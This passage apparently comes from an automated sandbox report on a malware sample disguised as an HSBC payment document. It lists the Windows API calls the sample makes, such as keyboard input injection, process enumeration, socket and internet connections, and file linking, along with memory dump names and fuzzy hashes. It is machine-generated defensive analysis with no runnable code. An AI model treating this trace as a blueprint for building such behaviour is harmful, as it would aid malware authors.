                                                                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00796A45
                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00796A51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2214342067-0
                                                                                                                                • Opcode ID: 6a7123ccc75b0debe4e705b9d91e0bd9965b672a5093afe774ce2d8d8d484057
                                                                                                                                • Instruction ID: 47843c4f6c95f33088e3209c11923677a658788ac85bad9590773acb6e8e88ea
                                                                                                                                • Opcode Fuzzy Hash: 6a7123ccc75b0debe4e705b9d91e0bd9965b672a5093afe774ce2d8d8d484057
                                                                                                                                • Instruction Fuzzy Hash: DB41C375700210AFEB60AF64EC8AF3A77E4DF04B10F48C158FA19AF2C2DA799D008795
                                                                                                                                APIs
                                                                                                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007AF910), ref: 007964A7
                                                                                                                                • _strlen.LIBCMT ref: 007964D9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _strlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4218353326-0
                                                                                                                                • Opcode ID: ad628f23cc82b0a3003e5bc1a7258827ce80e0648acdc900b95931d602afe4c6
                                                                                                                                • Instruction ID: 74ba80af74fedd53efc5510a76fbcf274f0c2786c4345bf8c53f639fb0c1dcdd
                                                                                                                                • Opcode Fuzzy Hash: ad628f23cc82b0a3003e5bc1a7258827ce80e0648acdc900b95931d602afe4c6
                                                                                                                                • Instruction Fuzzy Hash: F041C471A00114EFCF14EBA8FC99EAEB7B9AF44310F148255F91997296DB38EE50CB50
                                                                                                                                APIs
                                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0078B89E
                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0078B8C4
                                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0078B8E9
                                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0078B915
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3321077145-0
                                                                                                                                • Opcode ID: b077783006f1a97cc82294c7ac150ee9b99f44aed2bd8050b4b9a19c5104df06
                                                                                                                                • Instruction ID: 325508ebc8f88db4f5bd7412a388057674145eb9d4965f0a24067cc5b79752ac
                                                                                                                                • Opcode Fuzzy Hash: b077783006f1a97cc82294c7ac150ee9b99f44aed2bd8050b4b9a19c5104df06
                                                                                                                                • Instruction Fuzzy Hash: 1E412939600620DFCB10EF55D488A5DBBE1EF8A310F098098ED4A9B362CB38FD41CB95
                                                                                                                                APIs
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007A88DE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InvalidateRect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 634782764-0
                                                                                                                                • Opcode ID: 035fc0fa56b976184a69184b2ac0fc35de4e2e56c1c1f15021de730b80ca51ab
                                                                                                                                • Instruction ID: 015b0a707b7f5d57160882b99f6efdd33c6606c7c0615fb8a8926c770c9f9dff
                                                                                                                                • Opcode Fuzzy Hash: 035fc0fa56b976184a69184b2ac0fc35de4e2e56c1c1f15021de730b80ca51ab
                                                                                                                                • Instruction Fuzzy Hash: 9631F234600108EFEBA09B58CC85BBA37B5FB8B310F544212FA11E61A1CE3CE9809B57
                                                                                                                                APIs
                                                                                                                                • ClientToScreen.USER32(?,?), ref: 007AAB60
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 007AABD6
                                                                                                                                • PtInRect.USER32(?,?,007AC014), ref: 007AABE6
                                                                                                                                • MessageBeep.USER32(00000000), ref: 007AAC57
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1352109105-0
                                                                                                                                • Opcode ID: 8b5ac7b05ee8b7526cd39370764add9f9431d6eab992a48fc6f655f10fa06e23
                                                                                                                                • Instruction ID: 8bceaeef2f1effcd4f13b95d44861ba63259bd2a532d6aa5b66712ffd76db3bc
                                                                                                                                • Opcode Fuzzy Hash: 8b5ac7b05ee8b7526cd39370764add9f9431d6eab992a48fc6f655f10fa06e23
                                                                                                                                • Instruction Fuzzy Hash: 6C417F70600219EFDB11DF58D884B697BF5FF8A320F1482A9E8159F261D738E845CFA2
                                                                                                                                APIs
                                                                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00780B27
                                                                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00780B43
                                                                                                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00780BA9
                                                                                                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00780BFB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 432972143-0
                                                                                                                                • Opcode ID: 5e7be5571c34a94f6f1112d8e2b521af8040db9995b9f58aab6fc75be6df96dd
                                                                                                                                • Instruction ID: e890d3bb94f1f8f5c8ff8d0eaa1c7378ab1d2fab8d481ca046b7d76779abe666
                                                                                                                                • Opcode Fuzzy Hash: 5e7be5571c34a94f6f1112d8e2b521af8040db9995b9f58aab6fc75be6df96dd
                                                                                                                                • Instruction Fuzzy Hash: 4E315CB0DC0608AFFF71AB658C09BF9BFA5AB45324F04825AF490521D1C37C895897E5
                                                                                                                                APIs
                                                                                                                                • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00780C66
                                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00780C82
                                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00780CE1
                                                                                                                                • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00780D33
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 432972143-0
                                                                                                                                • Opcode ID: 658d66f5f1ce67c0433f1eac005fb616eee592688f738f4121a477a48d800fdb
                                                                                                                                • Instruction ID: ffea89463665f94a2732f3f8bd6c9efaf69bf653d39ab1a05549d1ee64a7fff1
                                                                                                                                • Opcode Fuzzy Hash: 658d66f5f1ce67c0433f1eac005fb616eee592688f738f4121a477a48d800fdb
                                                                                                                                • Instruction Fuzzy Hash: DA315830A80208AEFF70AFA5CC087FEBB66AB85320F04871AE484521D1C33D995997F1
                                                                                                                                APIs
                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007561FB
                                                                                                                                • __isleadbyte_l.LIBCMT ref: 00756229
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00756257
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0075628D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                • Opcode ID: 94af2bec6a77caf4414708babbbe21221c28f35c8145b1e9acd55a154a5ba088
                                                                                                                                • Instruction ID: b492e88bad5d409e5c8ac43f383a0baebc7fa91ddc4daaeb17f3ccf8524ff56c
                                                                                                                                • Opcode Fuzzy Hash: 94af2bec6a77caf4414708babbbe21221c28f35c8145b1e9acd55a154a5ba088
                                                                                                                                • Instruction Fuzzy Hash: 0C31C03060424AEFDF218F65CC48BBA7BA9FF41312F554128EC64871A1EBB9D954DB90
                                                                                                                                APIs
                                                                                                                                • GetForegroundWindow.USER32 ref: 007A4F02
                                                                                                                                  • Part of subcall function 00783641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078365B
                                                                                                                                  • Part of subcall function 00783641: GetCurrentThreadId.KERNEL32 ref: 00783662
                                                                                                                                  • Part of subcall function 00783641: AttachThreadInput.USER32(00000000,?,00785005), ref: 00783669
                                                                                                                                • GetCaretPos.USER32(?), ref: 007A4F13
                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 007A4F4E
                                                                                                                                • GetForegroundWindow.USER32 ref: 007A4F54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                • Opcode ID: 3315f082b2395857c05332062d2fbe2cfb9ed43e936273e21f513381092b64f1
                                                                                                                                • Instruction ID: 601fa21dfd76d2815cc7c2797eeb107bf6665a4180dbf6eb1213397031c8b764
                                                                                                                                • Opcode Fuzzy Hash: 3315f082b2395857c05332062d2fbe2cfb9ed43e936273e21f513381092b64f1
                                                                                                                                • Instruction Fuzzy Hash: 1E313071D00118AFDB04EFA9D885DEFB7F9EF89300F14446AE515E7201EA799E058BA1
                                                                                                                                APIs
                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00783C7A
                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00783C88
                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00783CA8
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00783D52
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 420147892-0
                                                                                                                                • Opcode ID: 866f10b597be09f640e53113a477d4fcd775465589cbbff436280ce43a0823fe
                                                                                                                                • Instruction ID: cc00649f1ec643f1e3e2487f3af681e15b9239470fa7e835877f1729dafc3a67
                                                                                                                                • Opcode Fuzzy Hash: 866f10b597be09f640e53113a477d4fcd775465589cbbff436280ce43a0823fe
                                                                                                                                • Instruction Fuzzy Hash: A731D171208305DFD304EF54D885EAFBBE8EF85310F40082DF581861A1EB79AA49CBA2
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623
                                                                                                                                • GetCursorPos.USER32(?), ref: 007AC4D2
                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0075B9AB,?,?,?,?,?), ref: 007AC4E7
                                                                                                                                • GetCursorPos.USER32(?), ref: 007AC534
                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0075B9AB,?,?,?), ref: 007AC56E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2864067406-0
                                                                                                                                • Opcode ID: d7ce8b95af0e76a21a926b8ea16988a224ccebaf7733d53396841a3c16c4bbed
                                                                                                                                • Instruction ID: ef757191dcd6d515580ecf4bea323de0f97ffdf15295cb3a0379c1e0f3a7ce6c
                                                                                                                                • Opcode Fuzzy Hash: d7ce8b95af0e76a21a926b8ea16988a224ccebaf7733d53396841a3c16c4bbed
                                                                                                                                • Instruction Fuzzy Hash: 7531A735900058FFCB16CF58C858DEA7BB5EF8A310F144165F9058B261C739AD60DF94
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0077810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00778121
                                                                                                                                  • Part of subcall function 0077810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0077812B
                                                                                                                                  • Part of subcall function 0077810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0077813A
                                                                                                                                  • Part of subcall function 0077810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00778141
                                                                                                                                  • Part of subcall function 0077810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00778157
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007786A3
                                                                                                                                • _memcmp.LIBCMT ref: 007786C6
                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007786FC
                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00778703
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1592001646-0
                                                                                                                                • Opcode ID: 230291bbdb27b1c175a54f4cb09706ef3b8297521815c9e1e41d064b19edd2c3
                                                                                                                                • Instruction ID: 1cac9fd3c82d766d33350d51f8d2a81de8c2c487f6914fdb36f89297f62fa235
                                                                                                                                • Opcode Fuzzy Hash: 230291bbdb27b1c175a54f4cb09706ef3b8297521815c9e1e41d064b19edd2c3
                                                                                                                                • Instruction Fuzzy Hash: B8216B71E80108EBDF10DFA4C949BEEB7B8EF45344F158059E458E7242EB38AE05CBA1
                                                                                                                                APIs
                                                                                                                                • __setmode.LIBCMT ref: 007409AE
                                                                                                                                  • Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00787896,?,?,00000000), ref: 00725A2C
                                                                                                                                  • Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00787896,?,?,00000000,?,?), ref: 00725A50
                                                                                                                                • _fprintf.LIBCMT ref: 007409E5
                                                                                                                                • OutputDebugStringW.KERNEL32(?), ref: 00775DBB
                                                                                                                                  • Part of subcall function 00744AAA: _flsall.LIBCMT ref: 00744AC3
                                                                                                                                • __setmode.LIBCMT ref: 00740A1A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 521402451-0
                                                                                                                                • Opcode ID: 0e3661ed6a73da013aa966e4ab0d6c9eb7d2c7754d6a19e204795211ab5299cb
                                                                                                                                • Instruction ID: 57effa93a02ef80b98269598015dce77b765c64057bb6152e4995e80e5ad0414
                                                                                                                                • Opcode Fuzzy Hash: 0e3661ed6a73da013aa966e4ab0d6c9eb7d2c7754d6a19e204795211ab5299cb
                                                                                                                                • Instruction Fuzzy Hash: 1D112771A04204EFDB04B7B4AC8FAFE77689F46320F648155F204A7182EF7C584257E5
                                                                                                                                APIs
                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007917A3
                                                                                                                                  • Part of subcall function 0079182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0079184C
                                                                                                                                  • Part of subcall function 0079182D: InternetCloseHandle.WININET(00000000), ref: 007918E9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1463438336-0
                                                                                                                                • Opcode ID: 044678d8d0a0cebcdb267da6352ce492c5da7bb645dc2eb80013e99fd7802766
                                                                                                                                • Instruction ID: 6de1ee4455788c31e1ab05a47804d52510c194381cd2a7b4a3f3ca687a4179be
                                                                                                                                • Opcode Fuzzy Hash: 044678d8d0a0cebcdb267da6352ce492c5da7bb645dc2eb80013e99fd7802766
                                                                                                                                • Instruction Fuzzy Hash: EF210B31200602BFDF129FA0EC00FBBB7E9FF89710F504429F91196550DB79D821A7A0
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNEL32(?,007AFAC0), ref: 00783A64
                                                                                                                                • GetLastError.KERNEL32 ref: 00783A73
                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00783A82
                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007AFAC0), ref: 00783ADF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
